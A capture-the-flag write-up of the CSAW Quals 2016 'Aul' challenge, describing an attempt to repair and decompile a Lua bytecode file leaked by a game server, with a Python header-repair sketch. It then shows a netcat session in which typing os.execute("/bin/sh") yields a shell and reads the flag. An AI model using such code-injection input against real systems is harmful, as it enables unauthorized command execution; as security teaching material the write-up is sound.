CSAW Quals 2016 – Aul

Aul was a pwn challenge where (unusually for a pwn challenge) you were only given a link to the server; no binary and no code.

Logging into the server reveals it to be some sort of game.

let's play a game
| 0 0 0 0 0 0 0 0 |
| 0 1 0 0 0 0 4 0 |
| 0 3 2 2 4 1 4 4 |
| 0 3 2 3 2 3 4 3 |
| 4 b 2 2 4 4 3 4 |
| 3 2 4 4 1 1 2 2 |
| 3 3 c d 3 3 2 3 |
| 3 2 1 4 4 a 2 4 |

If you type something, it tells you “Didn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.” Okay, let’s ask for help:

help

Huh, didn’t expect that. Well, it looks like some sort of binary data. Also, the header says “LuaS”. Maybe this is a compiled Lua program?

We download the binary from the server and try to run LuaDec on it; unfortunately, whatever we pulled from the server seems corrupted. We look at the specification for compiled Lua files for a bit, and then notice that there are a lot of ‘\r\n’s where there should probably only be ‘\n’s. We try correcting this. From reading the “Bytecode dissected” section on this link, we also notice that the header is missing its first character, and we correct that too, but our file still doesn’t decompile.
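The two repairs described above, followed by a header check, as a Python sketch (an added example, not the author's code). It assumes Lua 5.3 bytecode (the "S", 0x53, after "Lua" is the version byte), a little-endian 64-bit build, and that the missing first character is the ESC byte (0x1b) of the "\x1bLua" signature; the function names and the sample header are constructed for illustration.

```python
import struct

LUA_SIGNATURE = b"\x1bLua"         # ESC + "Lua"; the ESC is the "missing first character"
LUAC_DATA = b"\x19\x93\r\n\x1a\n"  # header canary that exposes newline translation

# Constructed sample: a Lua 5.3 header for a little-endian 64-bit build (assumption).
SAMPLE_HEADER = (LUA_SIGNATURE + b"\x53\x00" + LUAC_DATA + bytes([4, 8, 4, 8, 8])
                 + struct.pack("<q", 0x5678) + struct.pack("<d", 370.5))


def mangle(chunk: bytes) -> bytes:
    """Simulate the damage: leading ESC dropped, every LF sent as CR LF."""
    return chunk[1:].replace(b"\n", b"\r\n")


def repair_capture(raw: bytes) -> bytes:
    """Undo the CR LF translation and restore the missing ESC."""
    data = raw.replace(b"\r\n", b"\n")
    if data.startswith(b"Lua"):
        data = b"\x1b" + data
    return data


def check_header(chunk: bytes) -> list:
    """Return the problems found in a Lua 5.3 header (empty list means it is sane)."""
    problems = []
    if chunk[:4] != LUA_SIGNATURE:
        problems.append("bad signature")
    if chunk[4:6] != b"\x53\x00":
        problems.append("not Lua 5.3 in the official format")
    if chunk[6:12] != LUAC_DATA:
        problems.append("LUAC_DATA mismatch: newlines were translated")
    if len(chunk) < 17:
        return problems + ["truncated header"]
    # Size bytes: int, size_t, Instruction, lua_Integer, lua_Number.
    int_sz, num_sz = chunk[15], chunk[16]
    body = chunk[17:17 + int_sz + num_sz]
    if len(body) < int_sz + num_sz:
        return problems + ["truncated header"]
    if int.from_bytes(body[:int_sz], "little") != 0x5678:
        problems.append("LUAC_INT check failed")
    if num_sz != 8 or struct.unpack("<d", body[int_sz:])[0] != 370.5:
        problems.append("LUAC_NUM check failed")
    # U+FFFD means a text decoder already replaced the original bytes.
    if "\ufffd".encode() in chunk:
        problems.append("U+FFFD present: bytes were lost in text decoding")
    return problems
```

A capture that still fails these checks after repair has lost bytes somewhere other than the newlines and the signature, and no amount of patching the header will make it decompile.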

At this point I am fooling around, and randomly type “os.execute("/bin/sh")” into the program. It turns out that this actually works.

jon@jon-s76:~$ nc pwn.chal.csaw.io 8001
let's play a game
| 0 0 0 0 0 0 0 0 |
| 0 1 0 0 0 0 4 0 |
| 0 3 2 2 4 1 4 4 |
| 0 3 2 3 2 3 4 3 |
| 4 b 2 2 4 4 3 4 |
| 3 2 4 4 1 1 2 2 |
| 3 3 c d 3 3 2 3 |
| 3 2 1 4 4 a 2 4 |
os.execute("/bin/sh")
os.execute("/bin/sh")
ls
ls
flag  run.sh  scripty  server.lua  server.luac
cat flag
cat flag
flag{we_need_a_real_flag_for_this_chal}

If only getting shell on all pwns were this easy…
